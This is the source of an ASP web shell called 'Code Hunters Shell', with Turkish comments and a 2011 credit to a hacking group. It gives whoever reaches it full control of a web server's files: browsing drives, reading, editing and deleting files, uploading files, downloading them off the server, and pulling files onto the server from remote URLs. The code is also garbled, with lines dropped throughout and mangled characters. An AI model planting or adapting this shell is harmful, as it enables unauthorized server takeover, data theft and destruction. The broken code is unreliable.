Server Adress:

Dosya Yükle :
Current File : /home/u866425823/domains/

' ####
' ### Code Hunters TIM/Asi_besiktasli Tarafndan Cyber-Warrior.Org i?in yazlmtr. / 14.07.2011
' ### Misyon Dahilinde Kullanmanz Dile?iyle...
' ####

'Karakter Kodlamas

<title>Code Hunters Shell</title>
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* html div#path{
position: absolute !important;
top: expression(((document.documentElement.scrollTop || document.body.scrollTop) + this.offsetHeight-90) + ""px"");

function CodeHuntersPopup(){
yeniPencere ='', 'hakkimizda','height=300,width=600,resizable=0,status=0,left=100,top=50,scrollbars=0,menubar=0,toolbar=0');
yeniPencere.document.write('<title>Code Hunters TIM - Asi_Besiktasli</title><style type="text/css">body{background-color:#000;color:#00ff00;font-family:Verdana, Geneva, sans-serif;font-size:12px;}</style><br><br><br>By Cyber-Warrior Code Hunters TIM , Coded by Code Hunters TIM For Cyber-Warrior users. We wish good use...')}
<div id="baslik" align="center"><img src="" style="cursor:pointer" alt="Code Hunters TIM ASP Shell" title="Code Hunters TIM ASP Shell" onclick="CodeHuntersPopup()"></div><br>
'Dosya Yolu Urlden ?ekiliyor / karakteri \ karakteri olarak de?itiriliyor


'Fso nesnesini oluturuyoruz.
Set Fso=Server.Createobject("Scripting.FileSystemObject")

'E?er dosyayolu bo ise dosya yolu shellimizin bulundu?u klas?re ayarlanyor

If Path="" Then
Path = Server.Mappath("/")

ElseIf FSO.FolderExists(Path)=false Then
If islem="" Then
Path = FSO.GetParentFolderName(path)
End If

End If

'Code Hunters TIM 2011

If islem="" And Not Right(Path,1)="\" Then
Path = Path & "\"
End If

If islem<>"" Then
Dizin = Mid(Path,1,Instrrev(Path,"\"))
Dizin = Path
End If

' Sayfann ?st?nde Sabit Duracak Olan Dizin Formu yazdrlyor
Response.Write("<div id=""path""><form action=""?islem=git"" method=""post""> Bulundu?unuz Dizin <input type=""text"" name=""path"" size=""90"" value="""&Dizin&"""><input type=""submit"" value=""Git""> <a href=""?islem=Upload&Path="&Path&""">Upload</a> | <a href=""?islem=Search&Path="&Path&""">Dosya Arama</a> | <a href=""?islem=Dosyaindir&Path="&Path&""">Dosya Indir</a></form><a href=""?Path="" style=""font-weight:bold;text-decoration:underline"">ROOT(Ana Klas?r)</a>")&vbcrlf

' Fso ile Serverdaki S?r?c?lere Ulayoruz
Set Suruculer = FSO.Drives

If Not islem="Drivers" Then

Response.Write " || <span id=""drivers""><a href=""?islem=Drivers"" style=""text-decoration:underline"">S?r?c?ler:</a> </span>"
' Serverda ki Mevcut S?r?c?ler Yazdrlyor
For Each Surucu in Suruculer
Response.Write ("<a href=""?Path="&Surucu.DriveLetter&":"" style=""text-decoration:underline"">"&Surucu.DriveLetter&":\</a> ")&vbcrlf

End If

On Error GoTo 0
On Error Resume Next
Response.Write(" Klas?r izinleri: ")

'Aa?da ?nce ge?ici bir dosya oluturacaz oluturabiliyor ise yazma yetkisi var yazacak. Dosyay okuyabiliyosa okuma yetkisi var yazacak. Dosyay silebiliyorsa silme yetkisi var yazacak.

'Yazma Yetkisi
Set DosyaOlustur = Fso.CreateTextFile(Dizin & "\CodeHunters.txt", True)
Set DosyaOlustur = Nothing
'Hata verirse yazma yetkisi yok, Hata vermezse yazma yetkisi var

If Err<>0 then
Response.Write "Yazma Yetkisi Yok | "
Response.Write "Yazma Yetkisi Var | "
End If

' E?er Yazma Yetkisinde Hata verirse silme yetkisinde vermemesi i?in aa?daki kodlar yazyoruz

On Error GoTo 0
On Error Resume Next

'Okuma Yetkisi

'Dosyay okumak i?in a?yoruz
'Hata verirse okuma yetkisi yok, Hata vermezse okuma yetkisi var

Set DosyaOku= Fso.OpenTextFile(Dizin & "\CodeHunters.txt")
Set DosyaOku=Nothing

If Err<>0 then
Response.Write "Okuma Yetkisi Yok | "
Response.Write "Okuma Yetkisi Var | "
End If

On Error GoTo 0
On Error Resume Next

'Silme Yetkisi

'Oluturulan Ge?ici Dosya Siliniyor
'Hata verirse silme yetkisi yok hata vermezse silme yetkisi var
Fso.DeleteFile Dizin&"\CodeHunters.txt",true

If Err<>0 then
Response.Write "Silme Yetkisi Yok "
Response.Write "Silme Yetkisi Var "
End If

On Error GoTo 0
On Error Resume Next


' islem De?ikenine G?re Farkl Sayfalar ?karlyor
Select Case islem
Case "git"
'Dizin formu bu sayfaya yollanyor. Bu sayfada formdan gelen bilgiye g?re kullancy y?nlendiriyor
If Len(Request.Form("path"))>0 Then
End If
Case ""

' Urlden alnan Path Hazr hale getiriliyor
Set Klasor = FSO.GetFolder(Path)

' Dizindeki Alt Klas?rler ?ekiliyor
Set AltKlasorler = Klasor.SubFolders

' Dizindeki Dosyalar ?ekiliyor
Set Dosyalar = Klasor.Files

'?st Klas?r Varsa Link Ayarlanyor
If Klasor.IsRootFolder = False Then
Set UstKlasor = Klasor.ParentFolder
Response.Write "<br><a href=""?Path="& UstKlasor.Path &""">< ?st Klas?re Git</a>"
End If

Response.Write(" <b>"& Klasor.Path &"</b> | <a href=""?islem=CreateFolder&Path="&Path&""">Klas?r Olutur</a> | <a href=""?islem=CreateFile"">Dosya Olutur</a>" & vbCrLf)

Response.Write("<table width=""95%"" cellpadding=""4"" cellspacing=""1"" >")%><br><br>

<tr style="font-weight:bold; background-color:#484848">
<td width="30" class="baslik">Isim</TD><td width="15%" class="baslik">Dosya Boyutu</TD><td width="25%" class="baslik">T?r</TD><td width="35%" class="baslik">?lem</TD>
' Dizindeki Alt Klas?rleri Yazdryoruz
For Each AltKlasor In AltKlasorler
With Response
.Write("<tr style=""background-color:#313131"" onmouseover=""'#444444'"" onmouseout=""'#313131'""><td><a href=""?Path="& AltKlasor.Path &""" style=""display:block"">"& AltKlasor.Name &"</a></td>") & vbCrLf
.Write("<td></td><td>Dosya Klas?r?</td>") & vbCrLf
.Write("<td><a href=""?islem=FolderRename&path="&AltKlasor.Path&""">Isim De?itir</a> | <a href=""?islem=FolderMove&Path="&AltKlasor.Path&""">Ta</a> | <a href=""?islem=FolderCopy&Path="&AltKlasor.Path&""">Kopyala</a> | <a href=""?islem=FolderDelete&Path="&AltKlasor.Path&""">Sil</a></td></tr>")
End With

' Dizindeki Dosyalar Yazdryoruz
For Each Dosya In Dosyalar
With Response
.Write "<tr style=""background-color:#3F3F3F"" onmouseover=""'#4B4B4B'"" onmouseout=""'#3F3F3F'"">" & vbCrlf
.Write "<td class=""doslist""><a href=""?islem=Read&Path="& Dosya.path &""" style=""display:block"">"&"</a></td>" & vbCrlf
.Write "<td>"& Round(Dosya.Size / 1024) &" KB</td>" & vbCrlf
.Write "<td>"& Dosya.Type &"</td>" & vbCrlf
.Write "<td><a href=""?islem=Edit&path="&Path&"\"&Dosya.Name&""">D?zenle</a> | <a href=""?islem=FileRename&path="&Path&"\"&Dosya.Name&""">Isim De?itir</a> | <a href=""?islem=FileMove&Path="&Dosya.Path&""">Ta</a> | <a href=""?islem=FileCopy&Path="&Dosya.Path&""">Kopyala</a> | <a href=""?islem=indir&dosya="&Dosya.Path&""">Indir</a> | <a href=""?islem=FileDelete&Path="&Dosya.Path&""">Sil</a></td>" & vbCrlf
.Write "</tr>"
End With

' Driver ilemleri sayfas
Case "Drivers"

Set Suruculer = FSO.Drives

' Driver ?Zellikleri
Dim Drive_Type
Drive_Type = Array("Bilinmeyen","?karlabilir Disk","Sabit Disk","A? S?r?c?s?","CD-ROM","RAM-Disk")

Response.Write("<table><tr><td valign=""top""><br><span id=""drivers"">S?r?c?ler: </span></td>")&vbcrlf

'B?t?n Driverler okumak i?in d?ng? kuruluyor
For Each Surucu in Suruculer
Response.Write ("<td valign=""top""><table><tr><td><a href=""?Path="&Surucu.DriveLetter&":\"">"&Surucu.DriveLetter&":\</a></td></tr>")&vbcrlf

'E?er s?r?c? hazrsa ilemleri yap
If Surucu.isready Then
Response.Write(" ("&Surucu.VolumeName&")</td></tr>")&vbcrlf
Response.Write("<tr><td >Dosya Sistemi: "&Surucu.FileSystem&"</td></tr>")&vbcrlf
toplamalan = (Surucu.TotalSize / 1048576)
bosalan = (Surucu.AvailableSpace / 1048576)
Response.Write("<tr><td style=""border:solid 1px""><table height=""10"" width="""&(99-int(bosalan/toplamalan*100))&"%"" cellspacing=""0"" cellpadding=""0"" ><tr><td style=""background-color:#0099FF;color:#fff;font-size:10px;font-weight:bold"">%"&(100-int(bosalan/toplamalan*100))&"</td></tr></table></td></tr>")
Response.Write("<tr><td>Toplam Kapasite: "&Round(toplamalan,1) & " MB</td></tr>")&vbcrlf
Response.Write("<tr><td>Bo Alan: "&Round(bosalan,1) & " MB</td></tr>")&vbcrlf
End If

' Dosya i?eri?ini g?r?nt?leme sayfas
Case "Read"

' E?er dosya yoksa hata ver ilemi durdur
If FSO.FileExists(Path)= False Then
Response.Write("Dosya Bulunamad")
End If

'Dosyay hazr hale getiriliyor
Set qa = Fso.GetFile(Path)

Response.Write("<br>"&qa.path&" i?eri?i<br><br><hr><code>")
'Dosya a?lyor
Set Ag = qa.OpenAsTextStream(1,0)

'Dosya Bosa Hata Vermesi Engelleniyor
If Ag.AtEndOfStream Then
'Readall komutuyla dosyann i?eri?i okunuyor
kod = Server.HTMLEncode(ag.ReadAll)
End If

' Readall komutuyla dosya i?eri?ini ?ekince d?z yaz eklinde geldi?inden satrlara b?lmek i?in split komutu ile vbcrlf karakteri g?r?len yerlerden par?alama ilemi yapyoruz
icerik = Split(kod,vbcrlf)

'Split ile par?alanan b?l?mleri aralarna <br> ekleyerek satr haline getiriyoruz

For x=1 to Ubound(icerik)


' Text, Asp, Php Gibi Uzantl Yaz I?erikli Dosyalarn I?eri?ini D?zenleyen Sayfa)
Case "Edit"
If Request.QueryString("action")=1 Then
'Dosyann varl? kontrol ediliyor
If FSO.FileExists(Path)= False Then
Response.Write("Dosya Bulunamad")
End If

'Dosya hazr hale getiriliyor
Set qa = Fso.GetFile(Path)
'Dosya a?lyor
Set Ag = qa.OpenAsTextStream(2,0)
'Dosya i?eri?ine formdan yollanan yaz yazlyor
Response.Write(qa.Name&" Kayt Edildi")


'Dosyann varl? kontrole ediliyor
If FSO.FileExists(Path)= False Then
Response.Write("Dosya Bulunamad")
End If

'Dosya hazr hale getiriliyor
Set qa = Fso.GetFile(Path)

Response.Write("<br>"&qa.Name&" i?eri?i<br>")

'Dosya a?lyor
Set Ag = qa.OpenAsTextStream(1,0)

'Dosya Bosa Hata vermesi Engelleniyor
If Ag.AtEndOfStream Then
'Dosya i?eri?i okunuyor kod de?ikenine aktarlyor
Kod = Server.HTMLEncode(ag.ReadAll)
End If


Response.Write("<form action=""?islem=Edit&path="&path&"&action=1"" method=""post""><textarea name=""texticerik"" cols=""80"" rows=""25"">"&kod&"</textarea><br><input type=""submit"" value=""Kaydet""></form>")
End If

'Dosya Ismi De?itirme Sayfas
Case "FileRename"
If Request.QueryString("action")=1 Then

'Dosya hazr hale getiriliyor
Set FileRename = FSO.GetFile(Path)
' Dosyaya Yeni isim veriliyor

Response.Write("<br>Dosya ismi <b>"&Trim(NewName)&"</b> Olarak De?itirildi")
Response.Write("<br><form action=""?islem=FileRename&path="&path&"&action=1"" method=""post""><table><tr><td>Mevcut Isim: </td><td>"&oldname&"</td></tr><tr><td>Yeni isim: </td><td><input type=""text"" name=""newname""></td><tr><tr><td><input type=""submit"" value=""Kaydet""></td></tr></table></form>")
End If

'Klas?r Ismi De?itirme Sayfas
Case "FolderRename"

If Request.QueryString("action")=1 Then

'Klas?r hazr hale getiriliyor
Set FolderRename = FSO.GetFolder(Path)

'Klas?re yeni isim veriliyor

Response.Write("<br>Dosya ismi <b>"&Trim(NewName)&"</b> Olarak De?itirildi")
Response.Write("<br><form action=""?islem=FolderRename&path="&path&"&action=1"" method=""post""><table><tr><td>Mevcut Isim: </td><td>"&oldname&"</td></tr><tr><td>Yeni isim: </td><td><input type=""text"" name=""newname""></td><tr><tr><td><input type=""submit"" value=""Kaydet""></td></tr></table></form>")
End If

'Klas?r Tama Sayfas
Case "FolderMove"
'Klas?r?n varl? kontrol ediliyor
If FSO.FolderExists(Path)=False Then
Response.Write("<br>Klas?r Bulunamad")
End If

If Request.QueryString("action")=1 Then

Set KlasorTasi = FSO.GetFolder(Path)


'Klas?r Tanyor
KlasorTasi.Move Hedef
Response.Write "Klas?r "& Hedef & " Dizinine Tand"
Response.Write Path&" Klas?r?n? Ta<br><br><form action=""?islem=FolderMove&action=1&Path="&Path&""" method=""post""><b>Tanacak Dizin: </b><input type=""text"" name=""hedef"" value="""&Dizin&""" size=50><br><input type=""submit"" value=""Ta"" style=""width:100px""></form>"
End If

'Klas?r Kopyalama Sayfas
Case "FolderCopy"
'Dosyann varl? kkontrol ediliyor
If FSO.FolderExists(Path)=False Then
Response.Write("<br>Klas?r Bulunamad")
End If

If Request.QueryString("action")=1 Then

'Dosya hazr hale getiriliyor
Set KlasorKopyala = FSO.GetFolder(Path)


'Dosya kopyalanyor
KlasorKopyala.Copy Hedef

Response.Write "Klas?r "& Hedef & " Dizinine Kopyaland"
Response.Write "<form action=""?islem=FolderCopy&action=1&Path="&Path&""" method=""post""><b>Kopyalanacak Dizin: </b><input type=""text"" name=""hedef"" value="""&Path&""" size=50><br><input type=""submit"" value=""Ta"" style=""width:100px""></form>"
End If

'Dosya Kopyalama Sayfas
Case "FileCopy"

If FSO.FileExists(Path)=False Then
Response.Write("<br>Dosya Bulunamad")
End If
Set DosyaTasi = FSO.GetFile(Path)

If Request.QueryString("action")=1 Then
Set DosyaKopyala = FSO.GetFile(Path)

DosyaKopyala.Copy Hedef
Response.Write "Dosya "& Hedef & " Dizinine Kopyaland"
Response.Write "<form action=""?islem=FileCopy&action=1&Path="&Path&""" method=""post""><b>Kopyalanacak Dizin: </b><input type=""text"" name=""hedef"" value="""&Path&""" size=50><br><input type=""submit"" value=""Ta"" style=""width:100px""></form>"
End If

'Dosya Tama Sayfas
Case "FileMove"
'Dosyann varl? kontrol ediliyor
If FSO.FileExists(Path)=False Then
Response.Write("<br>Dosya Bulunamad")
End If
'Dosya kullanm i?in hazr hale getiriliyor
Set DosyaTasi = FSO.GetFile(Path)

If Request.QueryString("action")=1 Then

'Dosya tanyor
DosyaTasi.Move Hedef
Response.Write "Dosya "& Hedef & " Dizinine Tand"
Response.Write Path&" Dosyasn Ta<br><br><form action=""?islem=FileMove&action=1&Path="&Path&""" method=""post""><b>Tanacak Dizin: </b><input type=""text"" name=""hedef"" value="""&DosyaTasi.ParentFolder&""" size=50><br><input type=""submit"" value=""Ta"" style=""width:100px""></form>"
End If

'Dosya Silme Sayfas
Case "FileDelete"
'Dosyann varl? kontrol ediliyor
If FSO.FileExists(Path)=False Then
Response.Write("<br>Dosya Bulunamad")
End If

'Dosya kullanma hazr hale getiriliyor
Set DosyaSil = FSO.GetFile(Path)
If Request.QueryString("action")=1 Then

'Dosya siliniyor

Response.Write "Dosya Silindi.<br><br><a href=""?Path="&Mid(Path,1,InStrRev(Path,"\"))&""">Geri D?n</a>"
Response.Write("<b>"&Path&"</b><br>Dosyasn Ger?ekten Silmek Istiyor musunuz? <a href=""?islem=FileDelete&action=1&Path="&Path&""">Sil</a> </a>")
End If

'Klas?r Silme Sayfas
Case "FolderDelete"
'Klas?r?n varl? kontrol ediliyor
If FSO.FolderExists(Path)=False Then
Response.Write("<br>Klas?r Bulunamad")
End If

'Klas?r hazr hale getiriliyor
Set KlasorSil = FSO.GetFolder(Path)

If Request.QueryString("action")=1 Then

'Klas?r siliniyor
Response.Write "Klas?r Silindi.<br><br><a href=""?Path="&Mid(Path,1,InStrRev(Path,"\"))&""">Geri D?n</a>"
Response.Write("<b>"&Path&"</b><br>Klas?r?n? ve I?indeki Dosyalar Ger?ekten Silmek Istiyor musunuz? <a href=""?islem=FolderDelete&action=1&Path="&Path&""">Sil</a> </a>")
End If

' Klas?r Oluturma Sayfas
Case "CreateFolder"
If Request.QueryString("action")=1 Then

'Dosya oluturuluyor
Fso.CreateFolder Path&"\"&Trim(Request.Form("foldername"))

Response.Write(Path&"\"&Trim(Request.Form("foldername"))&" Klas?r? oluturuldu")
Response.Write("<form action=""?islem=CreateFolder&action=1&Path="&Path&""" method=""post"">Klas?r ad: <input type=""text"" name=""foldername""><input type=""submit"" value=""Olutur""></form>")
End If

' Dosya Oluturma Sayfas
Case "CreateFile"
If Request.QueryString("action")=1 Then

DosyaAdi = Request.Form("filename")

'Klas?r? Belirtiyoruz
Set Klasor = FSO.GetFolder(Path)
'Dosyay Oluturuyoruz
Set DosyaOlustur = Klasor.CreateTextFile(DosyaAdi)
'Dosya i?eri?ini Yazdyoruz

Response.Write(Path&"\"&DosyaAdi&" Dosyas Oluturuldu")

Set DosyaOlustur = Nothing

Response.Write("<form action=""?islem=CreateFile&action=1&Path="&Path&""" method=""post"">Dosya ad ve uzants: <input type=""text"" name=""filename""><br><textarea name=""icerik"" cols=80 rows=25></textarea><br><input style=""width:500px"" type=""submit"" value=""Olutur""></form>")
End If

'upload ?lemleri
Case "Upload"

Response.Buffer = True
Response.Expires = 0

Dim oFO, oProps, oFile, i, item, oMyName

Set oFO = New FileUpload

Set oProps = oFO.GetUploadSettings
with oProps
.UploadDirectory = Path ' dosyann y?klenece?i yer
.AllowOverWrite = true
End with
Set oProps = Nothing
If oFO.TotalFormCount > 0 Then
If oFO.FileCount > 0 Then
for i = 1 to oFO.FileCount
Set oFile = oFO.File(i)

If oFile.ErrorMessage <> "" Then
Response.Write "&gt; HATA: " & _
oFile.ErrorMessage & "<BR>"

If oFile.UploadSuccessful Then
Response.Write "&gt; Basariyla Y?klendi<BR>"

Response.Write(" - Dosyanin su an bulundu?u URL:<a href="""&oFile.URLPath&"""><font color=""red"">"& oFile.URLPath & "</font></a><BR>")

Response.Write(" - Dosya tipi: " & oFile.ContentType & "<BR>")

Response.Write(" - Dosya ismi: " & oFile.FileName & "<BR>")

Response.Write(" - Dosya boyutu: " & _
round(formatnumber(oFile.ByteCount, 0)/1024,2) & " KByte<BR>")
Response.Write "&gt; Dosyay y?klerken hata olutu: " & _
oFile.ErrorMessage & "<BR>"
End If
End If
Set oFile = Nothing
Response.Write "&gt; Daha ?nceden bu dosya ile ayni boyutta dosya y?klenmis. Bu durumda ayni dosyayi y?kl?yor olabilirsiniz. Eger farkli bir dosya olduguna eminseniz; Dosya boyutunu b?y?ltmek i?in k???k bir text dosyasini doldurarak zip'li dosyaya ekleyiniz."
End If

Response.Write "<BR><BR><A HREF=""?islem=Upload&Path="&Path&""">Tekrar Y?kle</A>"

End If

Set oFO = Nothing

'Dosya Arama
Case "Search"
If Request.QueryString("action")="1" Then

Response.Write "<table width=""95%"" cellpadding=""4"" cellspacing=""1"" align=""left"">"
Sub DosyaAra(KlasorYolu)

Set DosyaAraKlasor = Fso.GetFolder(KlasorYolu)
Set SearchSubFolders = DosyaAraKlasor.SubFolders
Set SearchFiles = DosyaAraKlasor.Files

For Each Dosyax In SearchFiles
If Instr(Dosyax.Name,Search)>0 Then
Response.Write "<tr style=""background-color:#3F3F3F"" onmouseover=""'#4B4B4B'"" onmouseout=""'#3F3F3F'""><td><a href=""?islem=Edit&Path="&Dosyax.Path&""">"&Dosyax.Path&"</a> </td><td>"&Dosyax.Type&"</td></tr>"
End If

For Each AltKla In SearchSubFolders
If Instr(lcase(AltKla.Name),lcase(Search))>0 Then
Response.Write "<tr style=""background-color:#313131"" onmouseover=""'#444444'"" onmouseout=""'#313131'""><td><a href=""?Path="&AltKla.Path&""">"&AltKla.Path&"</a> </td><td>"&AltKla.Type&"</td></tr>"
End If
DosyaAra AltKla.Path

End Sub

DosyaAra Path

Response.Write "<form action=""?islem=Search&action=1&Path="&Path&""" method=""post"">Aranacak Dizin: "&Path&"<br><br>Dosya Adn Veya Uzantsn Yazn <input type=""text"" name=""search""><input type=""submit"" value=""Ara""></form"
End If

'Dosya indirme sayfas
Case "indir"
Response.Buffer = True

Dosya = Request.QueryString("dosya")

Response.ContentType = "application/x-msdownload"
Response.AddHeader "cache-control","private"
Response.AddHeader "content-transfer-encoding", "binary"
Response.AddHeader "content-disposition", "attachment; filename=" & Mid(dosya, instrrev(dosya, "\") + 1, Len(dosya) - instrrev(dosya, "\"))
Set Dosyaindir = Server.CreateObject("Adodb.Stream")
Dosyaindir.type = 1
Dosyaindir.LoadFromFile Dosya
Response.BinaryWrite Dosyaindir.Read

Set Dosyaindir = Nothing

' Server'a Baka Bir siteden dosya y?kleme sayfas
Case "Dosyaindir"

Url = Request.Form("url")

If Len(Trim(Url))=0 Then

Response.Write("<form action=""?islem=Dosyaindir&Path="&Path&""" method=""post"">Dosyann indirilece?i dizin: "&Path&"<br><br>Dosya url: <input type=""text"" name=""url""><input type=""submit"" value=""Indir""></form>")


Set XmlHttp = Server.CreateObject("MSXML2.ServerXMLHTTP")
XmlHttp.Open "GET", Url, False

Set BinaryStream = Server.CreateObject("ADODB.Stream")
BinaryStream.Type = 1
BinaryStream.Write IndirilenDosya
BinaryStream.SaveToFile Path&"\"&Right(Url,(len(Url)-instrrev(Url,"/"))), 2

Set XmlHttp = Nothing
Set BinaryStream = Nothing

Response.Write "<strong> Dosya "& Path&"\"&Right(Url,(len(Url)-instrrev(Url,"/"))) &"</strong> klas?r?ne indirildi."

End If

Case "ShellDelete"
Fso.DeleteFile Server.Mappath("\")&Replace(FileName,"/","\")
Response.Write("Shell Silindi...")
End Select

If Err.number<>0 Then
End If

<center><a href="?islem=ShellDelete" onClick="return confirm('Code Hunters Shell i Ger?ekten Silmek Istiyor musunuz?')"><u>Code Hunters Shelli Serverdan Sil</u></a><br>
<br><u>Code Hunters TIM © 2011 </u>

'Uplaod Snf Balang?
Class FileUpload
Private UploadRequest, oProps, iFrmCt
Private iKnownFileCount, iKnownFormCount
Private oOutFiles

'Class balatlnca ?alacak sub
Private Sub Class_Initialize
iFrmCt = 0
Set oProps = New FO_Properties
Set UploadRequest = Server.CreateObject("Scripting.Dictionary")
iKnownFileCount = 0
iKnownFormCount = 0
Set oOutFiles = Server.CreateObject("Scripting.Dictionary")
End Sub

'Class bitiinde ?altralacak sub
Private Sub Class_Terminate
Set oOutFiles = Nothing
Set UploadRequest = Nothing
Set oProps = Nothing
End Sub

Public Function GetUploadSettings()
Set GetUploadSettings = oProps
End Function

Public Property Get FormCount
FormCount = iKnownFormCount
End Property

Public Property Get FileCount
FileCount = iKnownFileCount
End Property

Public Property Get TotalFormCount
TotalFormCount = iFrmCt
End Property

'form ifreleme ayarlar
Private Function GetFormEncType()
Dim sContType, hCutOff
'I?erik ayar yaplyor
sContType = Request.ServerVariables("CONTENT_TYPE")
hCutOff = instr(sContType, ";")
If hCutOff > 0 Then
sContType = UCase(Trim(Left(sContType, hCutOff - 1)))
sContType = UCase(Trim(sContType))
End If
GetFormEncType = sContType
End Function

Public Default Sub ProcessUpload
Dim RequestBin, oProcess, iTotBytes, key, arr, iKnownProps, oFile
Dim fofilecheck, sEncType, sReqMeth

'Dosya Boyutu alnyor
iTotBytes = Request.TotalBytes
If iTotBytes = 0 Then
iFrmCt = 0
exit sub
End If
'Request.BinaryRead ile yollanan dosyann binary kodlar okunuyor
RequestBin = Request.BinaryRead(iTotBytes)

sReqMeth = Request.ServerVariables("REQUEST_METHOD")
Select Case UCase(sReqMeth)
Case "POST"
sEncType = GetFormEncType
Select Case sEncType

Set oProcess = New FO_Processor
oProcess.BuildUploadRequest RequestBin, UploadRequest
Set oProcess = Nothing


Set oProcess = New FO_Processor
oProcess.BuildUploadRequest_ASCII oProcess.getString(RequestBin), UploadRequest
Set oProcess = Nothing

End Select

End Select

arr = uploadrequest.keys

If Not isarray(arr) Then
iFrmCt = 0
Exit Sub
End If

iFrmCt = ubound(arr)
For Each key In arr
If isobject(uploadrequest.item(key)) Then
iKnownProps = ubound(uploadrequest.item(key).keys) + 1
If iKnownProps = 4 Then
iKnownFileCount = iKnownFileCount + 1
Set fofilecheck = new FO_FileChecker

'Dosya ismi, input de?eri gibi bilgiler formdan ?ekiliyor

fofilecheck.SetCurrentProperties oProps
fofilecheck.FileInput_NamePath = uploadrequest.item(key).item("FileName")
fofilecheck.FileInput_ContentType = uploadrequest.item(key).item("ContentType")
fofilecheck.FileInput_BinaryText = uploadrequest.item(key).item("Value")
fofilecheck.FileInput_FormInputName = uploadrequest.item(key).item("InputName")
Set oFile = fofilecheck.ValidateVerifyReturnFile()
Set fofilecheck = Nothing

oOutFiles.add iKnownFileCount, oFile
Set oFile = Nothing
uploadrequest.remove key
ElseIf iKnownProps = 2 Then
iKnownFormCount = iKnownFormCount + 1
End If
End If
End Sub

Public Function File(ByVal blobName)
Dim blobs, blob, subdict, tmpName
blobs = oOutFiles.Keys
For Each blob In blobs
Set subdict = oOutFiles.Item(blob)
tmpName = subdict.frmInputName
If UCase(Trim(tmpName)) = UCase(Trim(blobName)) Then
blobName = blob
Exit For
End If
If isobject(oOutFiles.Item(blobName)) Then
Set File = oOutFiles.Item(blobName)
Set File = Nothing
End If
End Function

Public Function Form(ByVal inputName)
If isobject(UploadRequest.Item(inputName)) Then
Form = UploadRequest.Item(inputName).Item("Value")
Form = ""
End If
End Function

Public Function FormLen(ByVal inputName)
If isobject(UploadRequest.Item(inputName)) Then
FormLen = Len(UploadRequest.Item(inputName).Item("Value"))
FormLen = 0
End If
End Function

Public Function FormEx(ByVal inputName, ByVal vDefaultValue)
dim vTmp

If isobject(UploadRequest.Item(inputName)) Then
vTmp = UploadRequest.Item(inputName).Item("Value")
If len(trim(CStr(vTmp))) = 0 Then
FormEx = vDefaultValue
Exit Function
End If

FormEx = vTmp
Exit Function
End If

FormEx = vDefaultValue
End Function

Public Function Inputs()
If isobject(UploadRequest) Then
Inputs = UploadRequest.keys
Inputs = ""
End If
End Function

Public Sub ShowUploadForm()
Dim tmp, item

With Response
.Write("Dosyann Y?klenece?i Yol: "&Path&"<FORM ENCTYPE=""multipart/form-data"" ACTION=""?islem=Upload&Path="&Path&""" METHOD=""POST"">" & vbCrLf)
.Write("L?tfen bir dosya se?in:<br><INPUT TYPE=""FILE"" NAME=""blob"" src=""xx"" class=""files"" style=""width: 200px;border:1px solid #CCC;margin: 5px 0 0 0;""><BR><BR>" & vbCrLf)
.Write("<INPUT NAME=""myName"" type=""Hidden"" >" & vbCrLf)
.Write("<INPUT TYPE=""SUBMIT"" VALUE=""Y?kle"">" & vbCrLf)
.Write("</FORM>" & vbCrLf)
End With
End Sub
End Class

Class FO_FileChecker
Private oProps, sFileName, hFileBinLen, sFileBin, sFileContentType, sFileFormInputName

'Class balang?nda ?altrakacak kod
Private Sub Class_Initialize()
sFileName = ""
hFileBinLen = 0
sFileBin = ""
sFileContentType = ""
End Sub

Public Sub SetCurrentProperties(byref oPropertybag)
Set oProps = oPropertybag
End Sub

Public Property Let FileInput_FormInputName(ByVal fname)
sFileFormInputName = fname
End Property

Public Property Let FileInput_NamePath(ByVal fname)
Dim realfilename

realfilename = Right(fname, Len(fname) - InstrRev(fname,"\"))

sFileName = trim(realfilename)
End Property

Public Property Let FileInput_ContentType(ByVal conttype)
sFileContentType = conttype
End Property

Public Property Let FileInput_BinaryText(ByVal binstring)
Dim binlen

binlen = lenb(binstring)
hFileBinLen = binlen
sFileBin = binstring
End Property

Public Function ValidateVerifyReturnFile()
If IllegalCharsFound Then
Set ValidateVerifyReturnFile = FillFOFileObj(false, "", "", "dosya adnda ge?ersiz karakter bulunamaz", "", "", "", sFileFormInputName)
Exit Function
End If

If FileNameBadOrExists Then
Set ValidateVerifyReturnFile = FillFOFileObj(false, "", "", "bir dosya se?mediniz ya da se?ti?iniz dosya yolu yanl; bir di?er olaslk se?ti?iniz dosya zaten y?kl?", "", "", "", sFileFormInputName)
Exit Function
End If

Set ValidateVerifyReturnFile = FillFOFileObj(false, "", "", "", sFileContentType, sFileName, sFileBin, sFileFormInputName)
End Function

Private Function FillFOFileObj(byval success, byval abspath, byval virpath, byval stderr, byval contenttype, byval fname, byval binarytext, byval forminputname)
Dim oFile
Set oFile = New FO_File
oFile.SetCurrentProperties oProps
oFile.bSuccess = success
oFile.sAbsPath = abspath
oFile.sVirPath = virpath
oFile.sStdErr = stderr
oFile.sCType = contenttype
oFile.sFileName = fname
oFile.binValue = binarytext
oFile.frmInputName = forminputname
Set FillFOFileObj = oFile
End Function

Public Function IllegalCharsFound()
Dim re

' Regexp ile karakterleri i?eri?i kontrol ediliyor istemeyen karakter g?r?l?rse hata veriyor

Set re = new regexp
re.pattern = "\\\/\:\*\?\""\<\>\|" = true
re.ignorecase = true
If re.test(sFileName) Then
IllegalCharsFound = true
IllegalCharsFound = false
End If
Set re = Nothing
End Function

'Dosya ismi kontrol ediliyor
Public Function FileNameBadOrExists()
Dim absuploaddirectory, oFSO

If len(trim(sFileName)) = 0 Then
FileNameBadOrExists = true
Exit Function
End If

If oProps.AllowOverWrite Then
FileNameBadOrExists = false
Exit Function
End If

absuploaddirectory = oProps.uploaddirectory & "\" & trim(sFileName)

Set oFSO = server.createobject("Scripting.FileSystemObject")
If oFSO.FileExists(absuploaddirectory) Then
FileNameBadOrExists = true
FileNameBadOrExists = false
End If
Set oFSO = Nothing
End Function

End Class

Class FO_Processor
Private Function getByteString(byval StringStr)
dim char, i

For i = 1 to Len(StringStr)
char = Mid(StringStr, i, 1)
getByteString = getByteString & chrB(AscB(char))
End Function

Public Function getString(byval StringBin)
dim intCount

getString =""
For intCount = 1 to LenB(StringBin)
getString = getString & chr(AscB(MidB(StringBin, intCount, 1)))
End Function

Public Sub BuildUploadRequest_ASCII(ByVal sPostStr, ByRef UploadRequest)
dim i, j, blast, sName, vValue
dim tmphash

blast = false
i = -1
do while i <> 0
If i = -1 Then
i = 1
i = i + 1
End If
j = instr(i, sPostStr, "=") + 1
sName = mid(sPostStr, i, j-i-1)
i = instr(j, sPostStr, "&")
If i = 0 Then
